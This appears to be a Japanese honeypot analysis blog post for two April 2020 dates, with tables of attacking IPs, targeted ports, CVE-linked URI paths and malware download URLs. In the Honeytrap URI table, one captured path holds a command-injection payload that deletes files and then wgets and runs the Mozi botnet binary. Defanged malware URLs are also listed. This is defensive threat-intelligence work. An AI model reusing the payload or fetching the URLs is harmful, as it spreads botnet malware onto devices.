185[.]158[.]113[.]43 Russia 4284 件 Link
196[.]45[.]17[.]178 South Africa 3838 件 Link
197[.]50[.]113[.]185 Egypt 3697 件 Link
195[.]181[.]39[.]36 Iran 3501 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
45[.]146[.]253[.]35 Germany 36 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 1 件 Link
85[.]104[.]114[.]115 Turkey 1 件 Link
58[.]96[.]242[.]120 Singapore 1 件 Link
85[.]99[.]96[.]13 Turkey 1 件 Link
41[.]203[.]212[.]101 Kenya 1 件 Link
203[.]106[.]219[.]34 Malaysia 1 件 Link
128[.]14[.]209[.]234 United States 1 件 Link
94[.]101[.]137[.]230 Iran 1 件 Link
91[.]238[.]28[.]127 Russia 1 件 Link
191[.]37[.]212[.]63 Brazil 1 件 Link
200[.]57[.]192[.]246 Mexico 1 件 Link
94[.]242[.]26[.]158 Russia 1 件 Link
139[.]99[.]141[.]237 Australia 1 件 Link
185[.]75[.]98[.]234 Iraq 1 件 Link
86[.]104[.]10[.]9 Romania 1 件 Link
192[.]241[.]238[.]141 United States 1 件 Link
85[.]238[.]106[.]16 Ukraine 1 件 Link
179[.]124[.]214[.]77 Brazil 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
45[.]146[.]253[.]35 Germany 36 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 1 件 Link
85[.]104[.]114[.]115 Turkey 1 件 Link
58[.]96[.]242[.]120 Singapore 1 件 Link
85[.]99[.]96[.]13 Turkey 1 件 Link
41[.]203[.]212[.]101 Kenya 1 件 Link
203[.]106[.]219[.]34 Malaysia 1 件 Link
128[.]14[.]209[.]234 United States 1 件 Link
94[.]101[.]137[.]230 Iran 1 件 Link
91[.]238[.]28[.]127 Russia 1 件 Link
191[.]37[.]212[.]63 Brazil 1 件 Link
200[.]57[.]192[.]246 Mexico 1 件 Link
94[.]242[.]26[.]158 Russia 1 件 Link
139[.]99[.]141[.]237 Australia 1 件 Link
185[.]75[.]98[.]234 Iraq 1 件 Link
86[.]104[.]10[.]9 Romania 1 件 Link
192[.]241[.]238[.]141 United States 1 件 Link
85[.]238[.]106[.]16 Ukraine 1 件 Link
179[.]124[.]214[.]77 Brazil 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/sdk NMAP - -
/remote/login FortiGate Firewall's SSL-VPN - Link

02 WOWHoneypot

URI Path Target CVE Memo
/WSMAN WS-Management (WSMan) - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
/mOh9 - - -
/MAPI/APIUnknown - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 205723 件
/ - - 465 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 69 件
/nice - - 22 件
login[.]cgi D-Link Router - 21 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 20 件
sip:nm Session Initiation Protocol - 20 件
hxxp://checkip[.]amazonaws[.]com/ Unauthorized relay - 16 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 12 件
hxxp://pv[.]sohu[.]com/cityjson Unauthorized relay - 12 件
/cgi CGI - 11 件
/api api - 11 件
/version - - 11 件
/server-info Apache - 10 件
SERVER - - 10 件
/_ping Unknown - 9 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 8 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 8 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 5 件
/admin/assets/js/views/login[.]js FreePBX - 4 件
/v1[.]40/containers/json Docker Engine API - 4 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 4 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 3 件
/_search Elasticsearch - 3 件
/jmx JMX - 3 件
hxxp://example[.]com/ Unauthorized relay - 2 件
/json_rpc JSON-RPC - 2 件
/wls-wsat/CoordinatorPortType11 Weblogic CVE-2017-10271 2 件
/nmaplowercheck1587599427 Nmap - 2 件
/HNAP1 Linksys Router D-Link Router 2 件
/evox/about Nmap - 2 件
/sdk New - 2 件
/nmaplowercheck1587646230 Nmap - 2 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/jars Unknown - 1 件
rtsp://160[.]16[.]145[.]183:1025 Real Time Streaming Protocol - 1 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
/api/anonymous/cookie/post api - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/editBlackAndWhiteList DVR/NVR/IPC API - 1 件
/versions - - 1 件
/v1[.]16/version - - 1 件
/remote/login New - 1 件
/cgi-bin/luci CGI - 1 件
/login[.]htm Login Page - 1 件
/shell MVPower DVR - 1 件
RTSP://160[.]16[.]145[.]183:8554/ Real Time Streaming Protocol - 1 件
/ipp CUPS CVE-2015-1158 1 件
/GponForm/diag_Form DASAN Network Solutions CVE-2018-10561 1 件
/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${
IFS}*;${IFS}wget${IFS}hxxp://192[.]168[.
]1[.]1:8088/Mozi[.]m;${IFS}sh${IFS}/var/
tmp/Mozi[.]m
 CGI - 1 件
/solr/admin/info/system Apache Solr - 1 件
/hudson Unknown - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 35 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 18 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 8 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 2 件
/pma/scripts/setup[.]php phpMyAdmin - 2 件
/myadmin/scripts/setup[.]php Administrator - 2 件
/MyAdmin/scripts/setup[.]php Administrator - 2 件
/mysql/scripts/setup[.]php MySQL - 2 件
/sqladmin/scripts/setup[.]php SQLAdmin - 2 件
/phpmyadmin2/scripts/setup[.]php phpMyAdmin - 2 件
/db/scripts/setup[.]php Database - 2 件
/scripts/setup[.]php PHPMyAdmin - 2 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
/portal/redlion Unknown - 1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 1 件
/WSMAN New - 1 件
/hudson Unknown - 1 件
/ReportServer SQL Server Reporting Services CVE-2020-0618 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/admin/assets/js/views/login[.]js FreePBX - 8 件
/ - - 8 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 1 件
/mOh9 New - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件
/MAPI/API New - 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 206486 件
hxxp://51[.]255[.]170[.]237/pandora[.]mips 12 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6 件
hxxp://178[.]33[.]64[.]107/arm7 4 件
hxxp://19ce033f[.]ngrok[.]io/arm7 4 件
hxxp://212[.]114[.]52[.]128/arm7 2 件
hxxp://192[.]168[.]1[.]1:8088/Mozi[.]m 2 件
hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 1 件
hxxp://194[.]180[.]224[.]124/bins/mpsl 1 件
hxxp://164[.]132[.]92[.]180/xtc[.]arm7 1 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件
hxxp://176[.]123[.]3[.]96/arm7 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
110 185[.]158[.]113[.]43 Russia 3220 件 Link
3391 209[.]45[.]61[.]241 Peru 466 件 Link
3390 209[.]45[.]61[.]241 Peru 465 件 Link
3389 95[.]47[.]248[.]84 Ukraine 80 件 Link
3389 222[.]235[.]220[.]206 South Korea 14 件 Link
27295 185[.]202[.]2[.]120 France 5 件 Link
24884 185[.]202[.]1[.]19 France 4 件 Link
18096 185[.]202[.]1[.]19 France 4 件 Link
19899 185[.]202[.]1[.]19 France 4 件 Link
17161 185[.]202[.]1[.]19 France 4 件 Link
16842 185[.]202[.]1[.]19 France 4 件 Link
16761 185[.]202[.]1[.]19 France 4 件 Link
23854 185[.]202[.]1[.]19 France 4 件 Link
19512 185[.]202[.]1[.]19 France 4 件 Link
23375 185[.]202[.]1[.]19 France 4 件 Link
23586 185[.]202[.]1[.]19 France 4 件 Link
19829 185[.]202[.]1[.]19 France 4 件 Link
24966 185[.]202[.]1[.]19 France 4 件 Link
19918 185[.]202[.]1[.]19 France 4 件 Link
24944 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
110 3221 件
3390 476 件
3391 474 件
3389 150 件
20000 9 件
23854 8 件
23520 8 件
23586 7 件
24673 7 件
17841 7 件
23015 7 件
23112 7 件
23475 7 件
23132 7 件
23574 7 件
17725 7 件
22920 7 件
23906 7 件
19602 7 件
24260 7 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11021 件 Link
45[.]141[.]87[.]27 Russia 7532 件 Link
185[.]158[.]113[.]43 Russia 4284 件 Link
185[.]202[.]2[.]120 France 974 件 Link
209[.]45[.]61[.]241 Peru 931 件 Link
185[.]202[.]1[.]10 France 788 件 Link
185[.]202[.]1[.]248 France 308 件 Link
79[.]124[.]62[.]254 Bulgaria 224 件 Link
195[.]54[.]167[.]115 Russia 173 件 Link
185[.]202[.]1[.]85 France 138 件 Link
95[.]47[.]248[.]84 Ukraine 80 件 Link
185[.]202[.]0[.]25 United Kingdom 60 件 Link
185[.]153[.]196[.]99 Russia 58 件 Link
185[.]153[.]199[.]12 Russia 52 件 Link
185[.]202[.]1[.]249 France 38 件 Link
222[.]235[.]220[.]206 South Korea 14 件 Link
185[.]202[.]2[.]52 France 11 件 Link
185[.]176[.]221[.]207 Latvia 10 件 Link
141[.]98[.]81[.]254 Panama 9 件 Link
185[.]202[.]2[.]247 France 8 件 Link

Port 1433

IP Country Count AbuseIPDB
202[.]1[.]114[.]202 Philippines 27138 件 Link
36[.]78[.]201[.]226 Indonesia 25453 件 Link
106[.]3[.]43[.]25 China 17848 件 Link
103[.]205[.]140[.]73 India 12071 件 Link
31[.]156[.]3[.]35 Italy 10503 件 Link
116[.]232[.]155[.]70 China 8033 件 Link
115[.]75[.]48[.]138 Vietnam 7704 件 Link
160[.]202[.]65[.]90 United States 7589 件 Link
36[.]83[.]48[.]227 Indonesia 6638 件 Link
54[.]38[.]53[.]123 France 5651 件 Link
190[.]38[.]83[.]38 Venezuela 5309 件 Link
118[.]70[.]116[.]236 Vietnam 4573 件 Link
221[.]215[.]205[.]122 China 4468 件 Link
182[.]0[.]132[.]185 Indonesia 4319 件 Link
196[.]45[.]17[.]178 South Africa 3838 件 Link
197[.]50[.]113[.]185 Egypt 3697 件 Link
195[.]181[.]39[.]36 Iran 3501 件 Link
157[.]42[.]246[.]229 India 2484 件 Link
36[.]90[.]60[.]64 Indonesia 1993 件 Link
190[.]73[.]68[.]118 Venezuela 1562 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/22)

phpMyAdminによるスキャン行為を検知してました。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 435901 件
3391 SAVANT 2878 件
22 The Secure Shell (SSH) Protocol 1918 件
445 Microsoft-DS 1690 件
3390 Distributed Service Coordinator 1482 件
3389 MS WBT Server 200 件
22690 Unknown 101 件
543 Unknown 95 件
8001 VCOM Tunnel 95 件
46657 Unknown 91 件
255 Unknown 79 件
8080 HTTP Alternate (see port 80) 62 件
5904 Unknown 60 件
1028 Unknown 59 件
81 Unknown 56 件
8291 Unknown 55 件
2181 eforward 44 件
52869 Realtek SDK miniigd SOAP Service 43 件
3000 HBCIRemoteWare Client 42 件
7071 IWGADTS Aircraft Housekeeping Message 41 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
202[.]1[.]114[.]202 Philippines 62551 件 Link
221[.]215[.]205[.]122 China 58416 件 Link
61[.]0[.]245[.]235 India 55666 件 Link
185[.]229[.]9[.]135 Russia 54386 件 Link
106[.]3[.]43[.]25 China 48558 件 Link
115[.]75[.]48[.]138 Vietnam 42513 件 Link
183[.]131[.]85[.]18 China 21598 件 Link
36[.]76[.]7[.]130 Indonesia 19114 件 Link
160[.]202[.]65[.]90 United States 15887 件 Link
45[.]141[.]87[.]27 Russia 14347 件 Link
36[.]78[.]201[.]226 Indonesia 14087 件 Link
185[.]202[.]1[.]19 France 11527 件 Link
95[.]133[.]251[.]68 Ukraine 7874 件 Link
93[.]80[.]138[.]254 Russia 7054 件 Link
116[.]232[.]155[.]70 China 5696 件 Link
170[.]80[.]181[.]138 Brazil 3865 件 Link
80[.]82[.]65[.]74 Netherlands 2960 件 Link
195[.]88[.]193[.]15 Russia 2838 件 Link
27[.]254[.]207[.]47 Thailand 2818 件 Link
41[.]65[.]146[.]162 Egypt 2167 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
93[.]174[.]93[.]143 Netherlands 137 件 Link
45[.]146[.]253[.]35 Germany 38 件 Link
77[.]247[.]108[.]119 Estonia 5 件 Link
5[.]101[.]0[.]209 Russia 5 件 Link
121[.]45[.]84[.]61 Australia 4 件 Link
161[.]35[.]51[.]119 United States 2 件 Link
85[.]172[.]12[.]45 Russia 1 件 Link
128[.]14[.]134[.]170 United States 1 件 Link
128[.]199[.]220[.]9 Singapore 1 件 Link
77[.]46[.]163[.]158 Serbia 1 件 Link
196[.]52[.]43[.]94 South Africa 1 件 Link
200[.]2[.]129[.]27 Haiti 1 件 Link
128[.]14[.]209[.]178 United States 1 件 Link
94[.]140[.]114[.]17 Latvia 1 件 Link
5[.]188[.]210[.]101 Russia 1 件 Link
139[.]162[.]106[.]181 Japan 1 件 Link
34[.]220[.]240[.]213 United States 1 件 Link
198[.]108[.]66[.]176 United States 1 件 Link
167[.]99[.]40[.]21 Netherlands 1 件 Link
89[.]40[.]73[.]77 Romania 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
93[.]174[.]93[.]143 Netherlands 137 件 Link
45[.]146[.]253[.]35 Germany 38 件 Link
77[.]247[.]108[.]119 Estonia 5 件 Link
5[.]101[.]0[.]209 Russia 5 件 Link
121[.]45[.]84[.]61 Australia 4 件 Link
161[.]35[.]51[.]119 United States 2 件 Link
85[.]172[.]12[.]45 Russia 1 件 Link
128[.]14[.]134[.]170 United States 1 件 Link
128[.]199[.]220[.]9 Singapore 1 件 Link
77[.]46[.]163[.]158 Serbia 1 件 Link
196[.]52[.]43[.]94 South Africa 1 件 Link
200[.]2[.]129[.]27 Haiti 1 件 Link
128[.]14[.]209[.]178 United States 1 件 Link
94[.]140[.]114[.]17 Latvia 1 件 Link
5[.]188[.]210[.]101 Russia 1 件 Link
139[.]162[.]106[.]181 Japan 1 件 Link
34[.]220[.]240[.]213 United States 1 件 Link
198[.]108[.]66[.]176 United States 1 件 Link
167[.]99[.]40[.]21 Netherlands 1 件 Link
89[.]40[.]73[.]77 Romania 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ -

02 WOWHoneypot

URI Path Target CVE Memo
/adv,/cgi-bin/weblogin[.]cgi Zyxel NAS CVE-2020-9054 -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
- - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 479373 件
/ - - 317 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 43 件
login[.]cgi D-Link Router - 31 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 21 件
sip:nm Session Initiation Protocol - 18 件
/nice - - 17 件
hxxp://checkip[.]amazonaws[.]com/ Unauthorized relay - 14 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 13 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 12 件
/version - - 10 件
/cgi CGI - 7 件
SERVER - - 6 件
/api api - 6 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 6 件
/server-info Apache - 5 件
/jmx JMX - 5 件
/dana-na/auth/url_default/welcome[.]cgi New - 5 件
/admin/assets/js/views/login[.]js FreePBX - 3 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 3 件
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized relay - 3 件
/shell MVPower DVR - 3 件
/v1/agent/self Hashicorp Consul - 2 件
/_search Elasticsearch - 2 件
/_ping Unknown - 2 件
/tmUnblock[.]cgi Linksys E-series - 2 件
/setup/eureka_info Google Home Hub - 2 件
/v1[.]16/version - - 1 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 1 件
/json_rpc JSON-RPC - 1 件
/hudson Unknown - 1 件
/v1[.]40/containers/json Docker Engine API - 1 件
/solr/admin/info/system Apache Solr - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
rtsp://160[.]16[.]145[.]183:554 Real Time Streaming Protocol - 1 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/jars Unknown - 1 件
/info - - 1 件
/api/status api - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 39 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 33 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 4 件
/myadmin/scripts/setup[.]php Administrator - 3 件
/phpmy/scripts/setup[.]php phpMyAdmin - 3 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 3 件
/pma/scripts/setup[.]php phpMyAdmin - 3 件
/db/scripts/setup[.]php Database - 2 件
/mysql/scripts/setup[.]php MySQL - 2 件
/scripts/setup[.]php PHPMyAdmin - 2 件
/w00tw00t[.]at[.]blackhats[.]romanian[.]
anti-sec:)
 ZmEu - 1 件
/2phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/PMA/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2011/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2012/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2013/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2015/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2016/scripts/setup[.]php phpMyAdmin - 1 件
/PMA2018/scripts/setup[.]php phpMyAdmin - 1 件
/SQL/scripts/setup[.]php SQL - 1 件
/_PHPMYADMIN/scripts/setup[.]php phpMyAdmin - 1 件
/admin/db/scripts/setup[.]php Administrator - 1 件
/admin/mysql/scripts/setup[.]php MySQL - 1 件
/admin/pMA/scripts/setup[.]php phpMyAdmin - 1 件
/admin/phpMyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/admin/scripts/setup[.]php Administrator - 1 件
/admin/setup[.]php Administrator - 1 件
/admin/sql/scripts/setup[.]php SQL - 1 件
/admin/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/admin/sysadmin/scripts/setup[.]php Administrator - 1 件
/admin/web/scripts/setup[.]php Administrator - 1 件
/administrator/admin/scripts/setup[.]php Administrator - 1 件
/administrator/db/scripts/setup[.]php Administrator - 1 件
/administrator/pma/scripts/setup[.]php phpMyAdmin - 1 件
/administrator/web/scripts/setup[.]php Administrator - 1 件
/blog/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/cpadmin/scripts/setup[.]php Administrator - 1 件
/cpadmindb/scripts/setup[.]php Administrator - 1 件
/cpanelmysql/scripts/setup[.]php MySQL - 1 件
/cpanelphpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/database/scripts/setup[.]php Database - 1 件
/db/db-admin/scripts/setup[.]php Administrator - 1 件
/db/dbadmin/scripts/setup[.]php Administrator - 1 件
/db/dbweb/scripts/setup[.]php Database - 1 件
/db/myadmin/scripts/setup[.]php Administrator - 1 件
/db/phpMyAdmin-3/scripts/setup[.]php phpMyAdmin - 1 件
/db/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/db/phpmyadmin3/scripts/setup[.]php phpMyAdmin - 1 件
/db/webadmin/scripts/setup[.]php Administrator - 1 件
/db/webdb/scripts/setup[.]php Database - 1 件
/db/websql/scripts/setup[.]php SQL - 1 件
/dbadmin/scripts/setup[.]php Administrator - 1 件
/my/scripts/setup[.]php PHPMyAdmin - 1 件
/myadmin/setup/index[.]php - - 1 件
/mysql-admin/scripts/setup[.]php MySQL - 1 件
/mysql/admin/scripts/setup[.]php MySQL - 1 件
/mysql/db/scripts/setup[.]php MySQL - 1 件
/mysql/mysqlmanager/scripts/setup[.]php MySQL - 1 件
/mysql/pMA/scripts/setup[.]php phpMyAdmin - 1 件
/mysql/sqlmanager/scripts/setup[.]php MySQL - 1 件
/mysql/web/scripts/setup[.]php MySQL - 1 件
/mysqladmin/scripts/setup[.]php MySQL - 1 件
/mysqlmanager/scripts/setup[.]php MySQL - 1 件
/p/m/a/scripts/setup[.]php phpMyAdmin - 1 件
/php-my-admin/scripts/setup[.]php phpMyAdmin - 1 件
/php-myadmin/scripts/setup[.]php phpMyAdmin - 1 件
/php/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpLDAPadmin/scripts/setup[.]php Administrator - 1 件
/phpMyAdmi/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-2[.]10[.]0[.]0/scripts/setup
[.]php
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]10[.]0/scripts/setup[.]p
hp
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]11[.]1-all-languages/scr
ipts/setup[.]php
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]11[.]11[.]3/scripts/setu
p[.]php
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]11[.]11/scripts/setup[.]
php
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]5[.]5/index[.]php - - 1 件
/phpMyAdmin-2[.]5[.]5/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin-3[.]0[.]0[.]0-all-languages/
scripts/setup[.]php
 phpMyAdmin - 1 件
/phpMyAdmin-3/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin2//setup/index[.]php - - 1 件
/phpMyAds/scripts/setup[.]php phpMyAdmin - 1 件
/phpadmin/scripts/setup[.]php Administrator - 1 件
/phpmanager/scripts/setup[.]php phpMyAdmin - 1 件
/phpmy-admin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin/setup/index[.]php - - 1 件
/phpmyadmin1/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2011/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2012/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2013/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2014/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2015/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2017/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin2018/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin3/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin4/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin5/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin6/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin7/scripts/setup[.]php phpMyAdmin - 1 件
/phppgadmin/scripts/setup[.]php Administrator - 1 件
/phppma/scripts/setup[.]php phpMyAdmin - 1 件
/pma2006/scripts/setup[.]php phpMyAdmin - 1 件
/pma2007/scripts/setup[.]php phpMyAdmin - 1 件
/pma2008/scripts/setup[.]php phpMyAdmin - 1 件
/pma2014/scripts/setup[.]php phpMyAdmin - 1 件
/pma2017/scripts/setup[.]php phpMyAdmin - 1 件
/program/scripts/setup[.]php PHPMyAdmin - 1 件
/setup/index[.]php - - 1 件
/shopdb/scripts/setup[.]php PHPMyAdmin - 1 件
/sql/myadmin/scripts/setup[.]php SQL - 1 件
/sql/php-myadmin/scripts/setup[.]php SQL - 1 件
/sql/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
/sql/phpMyAdmin2/scripts/setup[.]php phpMyAdmin - 1 件
/sql/phpmanager/scripts/setup[.]php phpMyAdmin - 1 件
/sql/phpmy-admin/scripts/setup[.]php phpMyAdmin - 1 件
/sql/sql-admin/scripts/setup[.]php SQL - 1 件
/sql/sql/scripts/setup[.]php SQL - 1 件
/sql/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/sql/sqlweb/scripts/setup[.]php SQL - 1 件
/sql/webadmin/scripts/setup[.]php SQL - 1 件
/sql/webdb/scripts/setup[.]php SQL - 1 件
/sql/websql/scripts/setup[.]php SQL - 1 件
/sqladm/scripts/setup[.]php SQL - 1 件
/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/sqlmanager/scripts/setup[.]php SQL - 1 件
/sqlweb/scripts/setup[.]php SQL - 1 件
/web/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/web/scripts/setup[.]php web page - 1 件
/webadmin/scripts/setup[.]php Administrator - 1 件
/webdb/scripts/setup[.]php Database - 1 件
/websql/scripts/setup[.]php SQL - 1 件
/xampp/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/~/phpmanager/scripts/setup[.]php phpMyAdmin - 1 件
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized relay - 1 件
/hudson Unknown - 1 件
/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/adv,/cgi-bin/weblogin[.]cgi New - 1 件
/solr/admin/info/system Apache Solr - 1 件
/index[.]php - - 1 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/ - - 10 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/login Login Page - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件
//a2billing/customer/templates/default/f
ooter[.]tpl
 FreePBX - 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 479902 件
hxxp://178[.]33[.]64[.]107/arm7 10 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 8 件
hxxp://51[.]255[.]170[.]237/pandora[.]mips 7 件
hxxp://176[.]123[.]3[.]96/arm7 4 件
hxxp://212[.]114[.]52[.]128/arm7 3 件
hxxp://80[.]211[.]230[.]27:1691/dvrbot[.]arm7 3 件
hxxp://51[.]178[.]81[.]75/mips 1 件
hxxp://176[.]123[.]3[.]129/bins/enigma[.]mpsl 1 件
hxxp://185[.]172[.]110[.]224/wget 1 件
hxxp://51[.]222[.]0[.]40/bins/mpsl 1 件
hxxp://185[.]244[.]149[.]108:8000/mips 1 件
hxxp://178[.]32[.]148[.]5/arm7 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3391 27[.]254[.]207[.]47 Thailand 2112 件 Link
3390 209[.]45[.]61[.]241 Peru 746 件 Link
3391 209[.]45[.]61[.]241 Peru 745 件 Link
3390 27[.]254[.]207[.]47 Thailand 706 件 Link
3389 124[.]109[.]62[.]192 Pakistan 64 件 Link
5366 185[.]202[.]1[.]101 France 17 件 Link
3389 95[.]47[.]248[.]84 Ukraine 13 件 Link
28136 45[.]141[.]87[.]27 Russia 6 件 Link
17602 45[.]141[.]87[.]27 Russia 6 件 Link
23437 45[.]141[.]87[.]27 Russia 6 件 Link
22450 45[.]141[.]87[.]27 Russia 6 件 Link
28365 45[.]141[.]87[.]27 Russia 6 件 Link
27960 45[.]141[.]87[.]27 Russia 6 件 Link
23309 45[.]141[.]87[.]27 Russia 6 件 Link
28678 45[.]141[.]87[.]27 Russia 6 件 Link
22859 45[.]141[.]87[.]27 Russia 6 件 Link
27556 45[.]141[.]87[.]27 Russia 6 件 Link
18451 45[.]141[.]87[.]27 Russia 6 件 Link
17340 45[.]141[.]87[.]27 Russia 6 件 Link
28072 45[.]141[.]87[.]27 Russia 6 件 Link

Port

Port Count
3391 2878 件
3390 1480 件
3389 159 件
5366 17 件
22912 11 件
22939 10 件
24295 10 件
22923 10 件
17840 9 件
18733 9 件
18113 9 件
17607 9 件
23850 9 件
17562 9 件
23487 9 件
24212 9 件
23465 9 件
23820 9 件
22919 9 件
17602 9 件

IP

IP Country Count AbuseIPDB
45[.]141[.]87[.]27 Russia 14347 件 Link
185[.]202[.]1[.]19 France 11527 件 Link
27[.]254[.]207[.]47 Thailand 2818 件 Link
209[.]45[.]61[.]241 Peru 1491 件 Link
185[.]202[.]2[.]120 France 1002 件 Link
185[.]202[.]1[.]10 France 833 件 Link
185[.]202[.]1[.]248 France 720 件 Link
185[.]202[.]1[.]85 France 164 件 Link
89[.]144[.]47[.]29 Germany 112 件 Link
185[.]153[.]196[.]239 Russia 91 件 Link
92[.]63[.]194[.]21 Russia 91 件 Link
185[.]153[.]199[.]87 Russia 88 件 Link
185[.]202[.]1[.]189 France 86 件 Link
185[.]153[.]199[.]81 Russia 85 件 Link
92[.]63[.]194[.]241 Russia 80 件 Link
195[.]54[.]167[.]115 Russia 67 件 Link
124[.]109[.]62[.]192 Pakistan 64 件 Link
185[.]153[.]199[.]12 Russia 33 件 Link
185[.]202[.]2[.]149 France 26 件 Link
185[.]202[.]1[.]188 France 24 件 Link

